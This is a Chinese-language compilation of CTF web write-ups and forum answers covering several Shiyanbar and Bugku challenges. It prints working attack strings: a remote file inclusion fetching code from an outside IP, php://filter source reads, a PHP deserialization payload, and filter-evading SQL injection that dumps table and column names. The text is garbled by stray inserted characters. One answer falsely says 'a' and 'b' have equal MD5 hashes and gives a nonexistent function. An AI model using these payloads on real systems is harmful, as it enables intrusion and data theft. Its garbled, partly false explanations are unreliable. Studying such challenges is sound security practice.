㈠ [第四屆世安杯](web)writeup
利用ereg和strops處理數組的漏洞,提交?password[]=1
flag{Maybe_using_rexpexp_wasnt_a_clever_move}
觀察鏈接,file後面是一個睜棚base64,解碼為key.txt並沒有什麼用。將index.phpbase64,然後不斷修改line讀取源碼。
view-source:http://ctf1.shiyanbar.com/shian-quqi/index.php?line=&file=dGhpc2lzX2ZsYWcucGhw
flag{UHGgd3rfH*(3HFhuiEIWF}
最後:
x1=1a&x2={"友早拿x21":"2018a","x22":[[0],0]}&x3=XIPU18570
繞過x3的腳本
CTF{Php_1s_bstl4_1a}
源碼提示:``,那就直接進行爆破好了
腳本哪錯了?沒跑出來,不懂
讀取class.php:
http://ctf1.shiyanbar.com/shian-/index.php?user=http://120.27.32.227/3.txt&file=php://filter/convert.base64-encode/resource=class.php&pass=1
讀取index.php:
再通過序列化讀取flag:
http://ctf1.shiyanbar.com/shian-/index.php?user=http://120.27.32.227/3.txt&file=class.php&pass=O:4 :"Read":1:{s:4:"好搭file";s:57:" php://filter/read=convert.base64-encode/resource=f1a9.php ";}
哦豁。。第一個也可以用 php://input 而不是遠程包含繞過
flag_Xd{hSh_ctf:e@syt0g3t}
小記:emm....這種水平的比賽...確實對於某些水平來是浪費時間...感覺自己到了一個瓶頸,難的比賽又不會,一些比較簡單的所獲甚微。哎....還是要學啊
㈡ bugku_ctf,web第四題_post
這題跟第三題幾乎一樣,只不過散悶是將get方法換為了並掘老post方法。
使用插件如postman, hackbar, http request maker等等,很多插件。選擇post模式,然後在 Body Data (也就是請求主體,請求內容)部分輸入 what=flag ,提交即絕升可。
㈢ ctf web 求大神幫幫 payload是什麼
這是一段 PHP 代碼,看起來是一個 CTF 競賽中的題目。
這段辯碰代碼首先判埋腔斷 $_POST['cbc1'] 是否等於 $_POST['cbc2'],並且它們的 MD5 值也相等,如果條件成立,就會繼續判斷 $_POST['cbc3'] 是否等於 $_POST['cbc4'],並且它們的 MD5 值也相等,如果條件也成立,就會彎灶衫執行 eval($_GET['cmd'])。
因此,我們需要構造一個可以滿足上述兩個條件的 payload,以便執行 eval($_GET['cmd'])。
一個可能的 payload 如下:
cbc1=a&cbc2=b&cbc3=c&cbc4=dd&cmd=var_mp('Hello, world!')
在這個 payload 中,cbc1 和 cbc2 的值不相等,但是它們的 MD5 值相等,cbc3 和 cbc4 的值也不相等,但是它們的 MD5 值相等,同時執行的命令是 var_mp('Hello, world!')。如果這個 payload 成功執行,就會輸出字元串 Hello, world!,證明我們已經成功執行了命令。
㈣ 實驗吧web-簡單的sql注入之1
題目地址:http://ctf5.shiyanbar.com/423/web/
直接嘗試提交'or '1,成功爆出數據,說明單引號和or、空格都沒有被吃掉。
接下來再提交'union select 1%23,發現報錯
這就說明,我們提交的SQL語句被做了什麼處理,看報錯的1'來看,應該是union、select和%23(#)
我們再次提交'ununionion selectselect 1--,看到報錯
說明--也被吃掉了,而且後台對於union、select進行了處理,應該是將關鍵詞和空格一起吃掉了。
再次提交'union%0aselect%0a1',看到正確結果
初步注入成功,接下來獲取數據表名,同樣是繞過過濾,這里的關鍵詞過濾是吃掉它們一次,提交'union%0aselect%0agroupgroup_concat_concat(table_name)%0afrom%0ainformation_schema.tables%0awhere%0atabletable_schema_schema=database()%0aand'1
然後是列名,提交'union%0aselect%0agroupgroup_concat_concat(columncolumn_name_name)%0afrom%0ainformationinformation_schema.columns_schema.columns%0awhere%0atabletable_schema_schema=database()%0aand'1
getflag
getflag
the end